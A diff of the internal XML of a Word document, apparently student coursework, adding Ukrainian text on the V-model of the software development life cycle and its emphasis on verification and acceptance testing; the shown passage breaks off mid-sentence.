--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -2704,8 +2704,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> як </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -6544,7 +6542,22 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -6552,6 +6565,2251 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">V-образна модель </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>життєвого</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> циклу </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розробки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ПЗ</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>була</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">творена з метою </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>допомогти</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>працю</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ючій</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> над проектом </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>команді</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>плануванні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">з </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>забезпеченням</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>подальшої</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>можливості</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>тестування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>системи</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. У </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>цій</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>моделі</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>особливе</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>значення</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>надається</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>діям</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>спрямованим</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>верифікацію</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> і </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>атестацію</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> продукту. Вона </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>що</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>тестування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> продукту </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>обговорюється</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>проектує</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ться</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> і </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>планується</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ранніх</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>етапах</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>життєвого</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> циклу </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розробки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. План </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>випробування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>приймання</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>замовником</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розробляється</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>етапі</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>планування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, а компоновочного </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>випробування</w:t>
